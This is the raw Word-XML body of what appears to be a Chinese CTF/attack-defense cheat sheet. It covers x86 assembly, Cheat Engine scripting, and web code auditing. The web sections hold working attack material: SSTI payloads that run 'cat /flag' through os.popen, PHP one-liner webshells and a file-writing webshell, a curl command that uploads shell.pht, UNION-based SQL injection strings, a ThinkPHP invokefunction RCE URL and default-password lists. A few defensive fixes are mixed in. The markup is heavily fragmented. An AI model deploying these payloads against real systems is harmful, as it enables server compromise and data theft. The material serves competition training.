(把AL中字节的符号扩展到AH中去)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 字转换为双字. (把AX中的字的符号扩展到DX中去)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CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)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CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)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0" w:name="t2"/>
      <w:bookmarkEnd w:id="70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AND 与运算.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OR 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XOR 异或运算.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NOT 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TEST 测试.(两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作数作与运算,仅修改标志位,不回送结果).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逻辑左移.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SAL 算术左移.(=SHL)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SHR 逻辑右移.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SAR 算术右移.(=SHR)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ROL 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ROR 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RCL 通过进位的循环左移.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RCR 通过进位的循环右移.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以上八种移位指令,其移位次数可达255次.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移位一次时, 可直接用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作码. 如 SHL AX,1.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移位&gt;1次时, 则由寄存器CL给出移位次数.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 MOV CL,04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AX,CL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1" w:name="t3"/>
      <w:bookmarkEnd w:id="71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DS:SI 源串段寄存器 :源串变址.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ES:DI 目标串段寄存器:目标串变址.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CX 重复次数计数器.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AL/AX 扫描值.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D标志 0表示重复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作中SI和DI应自动增量; 1表示应自动减量.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Z标志 用来控制扫描或比较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作的结束.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MOVS 串传送.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MOVSB 传送字符. MOVSW 传送字. MOVSD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CMPS 串比较.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CMPSB 比较字符. CMPSW 比较字.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SCAS 串扫描.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把AL或AX的内容与目标串作比较,比较结果反映在标志位.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LODS 装入串.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把源串中的元素(字或字节)逐一装入AL或AX中.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LODSB 传送字符. LODSW 传送字. LODSD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STOS 保存串.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是LODS的逆过程.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 当CX/ECX&lt;&gt;0时重复.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REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX&lt;&gt;0时重复.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REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX&lt;&gt;0时重复.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REPC 当CF=1且CX/ECX&lt;&gt;0时重复.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REPNC 当CF=0且CX/ECX&lt;&gt;0时重复.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2" w:name="t4"/>
      <w:bookmarkEnd w:id="72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1&gt;无条件转移指令 (长转移)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JMP 无条件转移指令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 过程调用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RET/RETF过程返回.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2&gt;条件转移指令 (短转移,-128到+127的距离内)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当且仅当(SF XOR OF)=1时,OP1&lt;OP2 )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JA/JNBE 不小于或不等于时转移.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JAE/JNB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JB/JNAE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JBE/JNA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以上四条,测试无符号整数运算的结果(标志C和Z).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JG/JNLE 大于转移.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JGE/JNL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JL/JNGE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JLE/JNG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以上四条,测试带符号整数运算的结果(标志S,O和Z).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JE/JZ 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JNE/JNZ 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 有进位时转移.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JNC 无进位时转移.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JNO 不溢出时转移.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JNP/JPO 奇偶性为奇数时转移.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JNS 符号位为 “0”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JO 溢出转移.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JP/JPE 奇偶性为偶数时转移.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JS 符号位为 “1”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3&gt;循环控制指令(短转移)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 CX不为零时循环.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LOOPE/LOOPZ CX不为零且标志Z=1时循环.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LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.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JCXZ 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JECXZ ECX为零时转移.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 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INTO 溢出中断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IRET 中断返回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5&gt;处理器控制指令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HLT 处理器暂停, 直到出现中断或复位信号才继续.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WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.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ESC 转换到外处理器.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LOCK 封锁总线.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NOP 空**作.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STC 置进位标志位.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CLC 清进位标志位.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CMC 进位标志取反.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STD 置方向标志位.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CLD 清方向标志位.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STI 置中断允许位.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CLI 清中断允许位.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bookmarkStart w:id="73" w:name="t5"/>
      <w:bookmarkEnd w:id="73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define 定义一个标识符来表示变量.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registersymbol是注册符号,注册之后可以用名称代替地址.例如alloc(newmem1,1024)后调用registersymbol(newmem1)，然后在CE表里输入newmem1就会指向newmem1的起始地址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unRegistersymbol(newmem1)取消注册符号.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createthread(th1)创建线程启动.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 定义字(2字节).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PROC 定义过程.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ENDP 过程结束.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SEGMENT 定义段.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ASSUME 建立段寄存器寻址.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ENDS 段结束.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 程序结束.</w:t>
      </w:r>
      <w:bookmarkStart w:id="74" w:name="t6"/>
      <w:bookmarkEnd w:id="74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内存申请相关的函数主要有 alloca,calloc,malloc,free,realloc,sbrk等，malloc()和calloc()都可以用来动态分配内存空间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malloc()函数有一个参数,即要分配的内存空间的大小: void *malloc(size_t size);.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calloc()函数有两个参数,分别为元素的数目和每个元素的大小,这两个参数的乘积就是要分配的内存空间的大小。void *calloc(size_t numElements, size_t sizeOfElement).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dealloc(name)释放内存.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ret//重置地址.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db定义字节类型变量，一个字节数据占1个字节单元，读完一个，偏移量加1.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dw定义字类型变量，一个字数据占2个字节单元，读完一个，偏移量加2.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dd定义双字类型变量，一个双字数据占4个字节单元，读完一个，偏移量加4.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LABEL(KB)定义大小属性.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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc5799"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）ASCII码表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75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3150" cy="3981450"/>
            <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
            <wp:docPr id="12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 descr="IMG_25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6" w:name="_Toc19076"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通防</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc23643"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）PWN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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使用，将题目文件放在evilPatcher下的test文件夹，在evilPatcher文件夹打开cmd输入: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python evilPatcher.py test/文件名 sandboxs/mini_sandbox.asm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之后在test文件夹会发现打好补丁的文件名.patch文件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3124835"/>
            <wp:effectExtent l="0" t="0" r="5715" b="14605"/>
            <wp:docPr id="131" name="图片 131" descr="屏幕截图 2023-07-11 21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07-11 2105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0500" cy="1956435"/>
            <wp:effectExtent l="0" t="0" r="2540" b="952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8" w:name="_Toc10112"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Web代码审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78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/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc26953"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）PHP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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localeconv()函数：用于获取本地信息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current()函数：一个数组指针函数,用于获取当前指针所在位置的元素值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scandir()函数：获取当前文件目录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var_dump()函数：显示关于一个或多个表达式的结构信息，包括表达式的类型与值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array_flip(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)函数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用于反转/交换数组中的键名和对应关联的键值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array_rand()函数：随机获取数组元素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SQL注入漏洞防御：在存在漏洞的参数上使用addslash()方法：例如$username = addslashes($username);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WAF过滤缺失漏洞：存在WAF没有过滤的关键字符，例如!preg_match("/\'|http|\"|\`|cookie/", $str);变为!preg_match("/\'|http|\"|&lt;|&gt;|\`|cookie/", $str);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反序列化无参RCE攻击：无参RCE模板：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写文件进服务器：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var_dump(scandir(current(localeconv())));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随机读取服务器文件内容：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var_dump(readfile(array_rand(array_flip(scandir(current(localeconv()))))));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Xerte文件读取exp：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2" o:spt="75" type="#_x0000_t75" style="height:35pt;width:37pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId250" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1052" DrawAspect="Content" ObjectID="_1468075752" r:id="rId249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Xerte文件上传exp：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3" o:spt="75" type="#_x0000_t75" style="height:35pt;width:42.6pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId252" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1053" DrawAspect="Content" ObjectID="_1468075753" r:id="rId251">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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80" w:name="_Toc2738"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）Python</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80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SSTI漏洞防御：将存在漏洞的参数传递上使用双大括号方式传参：例如 template = 'Good Job %s!' % name变为template = 'Good Job {{name}}!'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SSTI漏洞攻击：当前文件：{{url_for['__glob'+'als__']['os']['popen']('cat *')['read']()}}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flag文件：{{url_for['__glob'+'als__']['os']['popen']('cat /flag')['read']()}}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('__glob'+'als__'：因为存在黑名单过滤，实际上也就是'__globals__'，代表文件操作协议。'os'：程序与操作系统进行交互的接口。'popen'：打开文件。'cat *'：读取当前页面的文件内容。'read'：读操作)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81" w:name="_Toc16604"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（三）Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81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fastjson漏洞防御：版本如果低于1.2.83则存在漏洞，将pom.xml中版本升级为1.2.83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2" w:name="_Toc8991"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Diresearch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82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在diresearch文件夹下打开cmd，输入python dirsearch.py -u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即可扫描该地址下所有页面信息，比御剑好用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55315"/>
            <wp:effectExtent l="0" t="0" r="4445" b="14605"/>
            <wp:docPr id="1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3" w:name="_Toc12861"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一句话木马</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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最基础一句话木马，配合蚁剑使用：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4" o:spt="75" type="#_x0000_t75" style="height:35pt;width:26.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId255" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1054" DrawAspect="Content" ObjectID="_1468075754" r:id="rId25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shell权限一句话木马，配合cmd指令使用，url后缀为?1=cmd指令（类似?1=cmd /flag或者?1=system('tac /f*');）：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5" o:spt="75" type="#_x0000_t75" style="height:35pt;width:31.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId257" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1055" DrawAspect="Content" ObjectID="_1468075755" r:id="rId25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Base64版上传一句话木马文件，访问上传的文件即可get shell，执行读取文件操作，参数为cmd，请求的url后缀为shell.php?cmd=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输入的cmd执行（例如cat /flag或者system('tac /f*');）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6" o:spt="75" type="#_x0000_t75" style="height:35pt;width:39.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId259" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1056" DrawAspect="Content" ObjectID="_1468075756" r:id="rId25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Burpsuite一句话木马请求发送，配合蚁剑使用，主要用来处理没有上传页面只有接口的请求，注意修改接口和url：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7" o:spt="75" type="#_x0000_t75" style="height:35pt;width:108pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId261" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1057" DrawAspect="Content" ObjectID="_1468075757" r:id="rId26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PHP一句话读取flag：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8" o:spt="75" type="#_x0000_t75" style="height:35pt;width:33.95pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId263" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1058" DrawAspect="Content" ObjectID="_1468075758" r:id="rId26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php_everywhere木马，任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求，并在站点上执行任意 PHP 代码，将里面的代码覆盖到网页中的任意位置，保存后在出现的内容点击Execute按钮，之后访问url前缀/fuck.php?cmd=cmd指令（类似/fuck.php?cmd=system('tac /f*');），注意修改里面的url地址：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9" o:spt="75" type="#_x0000_t75" style="height:35pt;width:83.15pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId265" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1059" DrawAspect="Content" ObjectID="_1468075759" r:id="rId26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输入框读文件一句话木马：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0" o:spt="75" type="#_x0000_t75" style="height:35pt;width:38.55pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId267" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1060" DrawAspect="Content" ObjectID="_1468075760" r:id="rId26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多种一句话木马混打：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1" o:spt="75" type="#_x0000_t75" style="height:35pt;width:36.5pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId269" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1061" DrawAspect="Content" ObjectID="_1468075761" r:id="rId268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文件放在虚拟机桌面后运行：curl -i -s -X POST -F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"mailto:\“logo_file=@shell.pht\”"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6"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>logo_file=@shell.pht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/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ur地址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46320" cy="3756660"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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之后访问：url前缀/data/media/labels/shell.pht，或者用剩下几种一句话效果尝试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70100"/>
            <wp:effectExtent l="0" t="0" r="6350" b="254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PHP小马编写：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$path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$text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$file = fopen($path,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w+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fwrite($file,$text);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&lt;form action=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post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//读取当前文件路径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&lt;?echo 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DOCUMENT_ROOT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].$_SERVER[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PHP_SELF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];?&gt;&lt;/br&gt;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//保存内容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//写入内容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&lt;br&gt;&lt;textarea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cols=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90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rows=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50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&gt;&lt;/textarea&gt;&lt;br&gt;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&lt;/form&gt;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JSP一句话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&lt;%execute request(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)%&gt;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PHP绕过WAF的一句话，原理是利用BASE64拼接后解码出来就是传统一句话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2495550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4" w:name="_Toc22177"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>手写SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc23021"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）json传参形式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85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爆库：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--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT database()),3,4,5,6,7,8,9,0,1,2;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08220" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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爆字段：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group_concat(column_name) from information_schema.columns where table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x表名的16进制字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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1158240"/>
            <wp:effectExtent l="0" t="0" r="0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爆数据：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group_concat(flag) from flag),3,4,5,6,7,8,9,0,1,2; -- "}'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4800600" cy="1127760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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86" w:name="_Toc3474"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）时间盲注脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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注意更改里面的地址和burpsuite拦截的请求header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62" o:spt="75" type="#_x0000_t75" style="height:35pt;width:127.75pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId277" o:title=""/>
            <o:lock v:ext="edit" aspectratio="t"/>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1062" DrawAspect="Content" ObjectID="_1468075762" r:id="rId276">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2654300"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270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7" w:name="_Toc19764"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87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文件读取漏洞：在接口url参数后追加file:/文件名，即url前缀?参数名=file:/文件名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8" w:name="_Toc1297"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>杂七杂八的东西</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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F12查看网站源代码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F12查看网站网络选项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94155"/>
            <wp:effectExtent l="0" t="0" r="635" b="14605"/>
            <wp:docPr id="1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 RCE 漏洞payload：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Index.php?s=/Index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=md5&amp;vars[1][]=3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网站登录通用：用户名admin或者test，密码admin或者123456或者test或者12345678</w:t>
      </w:r>
      <w:bookmarkStart w:id="89" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="8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注入页面判断：表单输入，报错页面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845BE7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AE845BE7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1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245FE0E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C245FE0E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45706A8C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="45706A8C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hOTIzZmFjNzM2NjNkMWJjODQ0ZmQ5OTg4MjU2MDAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="00704A4F"/>
    <w:rsid w:val="01D61F2D"/>
    <w:rsid w:val="01D760C7"/>
    <w:rsid w:val="026966BD"/>
    <w:rsid w:val="02B84AEF"/>
    <w:rsid w:val="02BB123E"/>
    <w:rsid w:val="030F2B8E"/>
    <w:rsid w:val="03DF048D"/>
    <w:rsid w:val="043200C6"/>
    <w:rsid w:val="048768F9"/>
    <w:rsid w:val="059D4940"/>
    <w:rsid w:val="05A2220A"/>
    <w:rsid w:val="076C7A30"/>
    <w:rsid w:val="07A14CA1"/>
    <w:rsid w:val="07B076BE"/>
    <w:rsid w:val="086821BB"/>
    <w:rsid w:val="08A745CE"/>
    <w:rsid w:val="08AA290B"/>
    <w:rsid w:val="08C110B3"/>
    <w:rsid w:val="09005E8F"/>
    <w:rsid w:val="095A138C"/>
    <w:rsid w:val="097931B9"/>
    <w:rsid w:val="0A347949"/>
    <w:rsid w:val="0A772CB2"/>
    <w:rsid w:val="0B2829D3"/>
    <w:rsid w:val="0B3C0D97"/>
    <w:rsid w:val="0B63410E"/>
    <w:rsid w:val="0CFD08A6"/>
    <w:rsid w:val="0D0D38A1"/>
    <w:rsid w:val="0DC96AEB"/>
    <w:rsid w:val="0E15476E"/>
    <w:rsid w:val="0E211365"/>
    <w:rsid w:val="0F441D98"/>
    <w:rsid w:val="0FBF0E36"/>
    <w:rsid w:val="0FD22917"/>
    <w:rsid w:val="0FE057E7"/>
    <w:rsid w:val="101C2183"/>
    <w:rsid w:val="10760620"/>
    <w:rsid w:val="11F76490"/>
    <w:rsid w:val="13675A6C"/>
    <w:rsid w:val="155A5250"/>
    <w:rsid w:val="155B33AF"/>
    <w:rsid w:val="1621774D"/>
    <w:rsid w:val="16894891"/>
    <w:rsid w:val="16AA3FB0"/>
    <w:rsid w:val="16BC60CF"/>
    <w:rsid w:val="1711641B"/>
    <w:rsid w:val="172F68A1"/>
    <w:rsid w:val="17A9174F"/>
    <w:rsid w:val="186B4BB2"/>
    <w:rsid w:val="188F2775"/>
    <w:rsid w:val="189D7D8B"/>
    <w:rsid w:val="18A60F7E"/>
    <w:rsid w:val="18E11E1D"/>
    <w:rsid w:val="1AA177C7"/>
    <w:rsid w:val="1B496541"/>
    <w:rsid w:val="1C2C6485"/>
    <w:rsid w:val="1CB232A3"/>
    <w:rsid w:val="1D7544DC"/>
    <w:rsid w:val="1EC30A08"/>
    <w:rsid w:val="1EEF34C3"/>
    <w:rsid w:val="1F100F69"/>
    <w:rsid w:val="1F2E492C"/>
    <w:rsid w:val="1FAA6C81"/>
    <w:rsid w:val="210E7527"/>
    <w:rsid w:val="21C909B0"/>
    <w:rsid w:val="22FD67B2"/>
    <w:rsid w:val="23197F0B"/>
    <w:rsid w:val="232F773D"/>
    <w:rsid w:val="239F4DAE"/>
    <w:rsid w:val="23E432A9"/>
    <w:rsid w:val="23E46569"/>
    <w:rsid w:val="24FF3DCA"/>
    <w:rsid w:val="2668592C"/>
    <w:rsid w:val="27501771"/>
    <w:rsid w:val="27B73D37"/>
    <w:rsid w:val="28403326"/>
    <w:rsid w:val="29636D67"/>
    <w:rsid w:val="297C604C"/>
    <w:rsid w:val="29AE3EF0"/>
    <w:rsid w:val="29C61360"/>
    <w:rsid w:val="2AA4465F"/>
    <w:rsid w:val="2C004C21"/>
    <w:rsid w:val="2C235436"/>
    <w:rsid w:val="2CD94F5A"/>
    <w:rsid w:val="2E18735B"/>
    <w:rsid w:val="2E5B7B24"/>
    <w:rsid w:val="2ECD71C0"/>
    <w:rsid w:val="2F1E4802"/>
    <w:rsid w:val="2F212C9F"/>
    <w:rsid w:val="2F3852AD"/>
    <w:rsid w:val="30206792"/>
    <w:rsid w:val="303374B1"/>
    <w:rsid w:val="30420572"/>
    <w:rsid w:val="310C1E66"/>
    <w:rsid w:val="32DD4FAB"/>
    <w:rsid w:val="331D056C"/>
    <w:rsid w:val="341267CF"/>
    <w:rsid w:val="347907F4"/>
    <w:rsid w:val="355754E9"/>
    <w:rsid w:val="3564725F"/>
    <w:rsid w:val="357A2F85"/>
    <w:rsid w:val="36423FA5"/>
    <w:rsid w:val="364628BE"/>
    <w:rsid w:val="36745128"/>
    <w:rsid w:val="37C15E51"/>
    <w:rsid w:val="38201771"/>
    <w:rsid w:val="386A4CA5"/>
    <w:rsid w:val="389C7A7C"/>
    <w:rsid w:val="38E34815"/>
    <w:rsid w:val="39044542"/>
    <w:rsid w:val="39047428"/>
    <w:rsid w:val="39100904"/>
    <w:rsid w:val="3938118D"/>
    <w:rsid w:val="3990325F"/>
    <w:rsid w:val="3A0F1782"/>
    <w:rsid w:val="3BF22EC0"/>
    <w:rsid w:val="3C512BB8"/>
    <w:rsid w:val="3CD218F9"/>
    <w:rsid w:val="3DBB7BAD"/>
    <w:rsid w:val="3DD00B61"/>
    <w:rsid w:val="3DEE759F"/>
    <w:rsid w:val="3DF75380"/>
    <w:rsid w:val="3E0C4FB9"/>
    <w:rsid w:val="3E4D124E"/>
    <w:rsid w:val="3E740352"/>
    <w:rsid w:val="3EE95051"/>
    <w:rsid w:val="3F0C1D23"/>
    <w:rsid w:val="3F1948CA"/>
    <w:rsid w:val="3FFE2DF1"/>
    <w:rsid w:val="40EC63D5"/>
    <w:rsid w:val="41105DBD"/>
    <w:rsid w:val="4189192E"/>
    <w:rsid w:val="42A96A84"/>
    <w:rsid w:val="42AE3A09"/>
    <w:rsid w:val="430B229D"/>
    <w:rsid w:val="43CE2E1A"/>
    <w:rsid w:val="43EE526A"/>
    <w:rsid w:val="45303661"/>
    <w:rsid w:val="455A7574"/>
    <w:rsid w:val="466730B2"/>
    <w:rsid w:val="46BE246A"/>
    <w:rsid w:val="46C33583"/>
    <w:rsid w:val="471529E4"/>
    <w:rsid w:val="47381764"/>
    <w:rsid w:val="47710CD2"/>
    <w:rsid w:val="478D0A11"/>
    <w:rsid w:val="47E15718"/>
    <w:rsid w:val="47E24441"/>
    <w:rsid w:val="48671147"/>
    <w:rsid w:val="48684DB2"/>
    <w:rsid w:val="493B0514"/>
    <w:rsid w:val="495A6762"/>
    <w:rsid w:val="4968436B"/>
    <w:rsid w:val="49B82BBD"/>
    <w:rsid w:val="49BD39F5"/>
    <w:rsid w:val="49DB012C"/>
    <w:rsid w:val="49EE2BEE"/>
    <w:rsid w:val="4A3634C7"/>
    <w:rsid w:val="4A5C3511"/>
    <w:rsid w:val="4A643210"/>
    <w:rsid w:val="4A851D59"/>
    <w:rsid w:val="4B1C474D"/>
    <w:rsid w:val="4B4B4D7A"/>
    <w:rsid w:val="4B52319F"/>
    <w:rsid w:val="4B57312E"/>
    <w:rsid w:val="4B7055BD"/>
    <w:rsid w:val="4BBC0B39"/>
    <w:rsid w:val="4C3978F6"/>
    <w:rsid w:val="4CF7224F"/>
    <w:rsid w:val="4D5C4385"/>
    <w:rsid w:val="4E9379D8"/>
    <w:rsid w:val="4F4A3571"/>
    <w:rsid w:val="4FA9463B"/>
    <w:rsid w:val="50E80F89"/>
    <w:rsid w:val="50F3012F"/>
    <w:rsid w:val="52086007"/>
    <w:rsid w:val="537F0B6E"/>
    <w:rsid w:val="53963229"/>
    <w:rsid w:val="54514A55"/>
    <w:rsid w:val="545729B8"/>
    <w:rsid w:val="547A0454"/>
    <w:rsid w:val="54EE191B"/>
    <w:rsid w:val="55012924"/>
    <w:rsid w:val="55853DCD"/>
    <w:rsid w:val="561E1732"/>
    <w:rsid w:val="562F5031"/>
    <w:rsid w:val="564E7173"/>
    <w:rsid w:val="5655283A"/>
    <w:rsid w:val="56863F58"/>
    <w:rsid w:val="56C40919"/>
